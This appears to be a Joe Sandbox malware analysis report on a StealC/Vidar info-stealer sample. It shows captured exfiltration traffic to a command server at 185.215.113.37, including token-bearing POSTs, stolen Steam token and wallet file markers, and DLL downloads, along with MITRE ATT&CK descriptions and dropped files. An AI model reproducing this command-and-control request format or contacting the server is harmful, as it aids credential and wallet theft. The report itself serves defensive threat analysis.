name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file"------BGCFBGDHJKFIEBFIECGH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file"------FIJKEHJJDAAKFHIDAKFH--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 2d 2d 0d 0a Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="message"wallets------KFBFCAFCBKFIEBFHIDBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="message"files------IEHDBGDHDAECBGDHJKFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="file"------CFBAKEHIEBKJJJJJKKKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 2d 2d 0d 0a Data Ascii: ------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="message"ybncbhylepme------DHDBGHCBAEGCBFHJEBFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKEHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFBAKEHIEBKJJJJJKKKE--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEBKFIJE

C:\ProgramData\CFCFCAAAAFBAKEBFBAKKFCBGDH

C:\ProgramData\FCAECAKKFBGCBGDGIEHC

C:\ProgramData\GCGDGHCBGDHJJKECAECBAEGCBG

C:\ProgramData\GHDBKJKJ

C:\ProgramData\GHDBKJKJKKJDGDGDGIDGIIDAAK

C:\ProgramData\HIDHIEGIIIECAKEBFBAAEBKFCF

C:\ProgramData\HJJKJJDHCGCAECAAECFH

C:\ProgramData\KFBFCAFCBKFIEBFHIDBA

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 00359860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 003445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0034BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6435A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00354910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00359C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00347710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00350250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00345100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

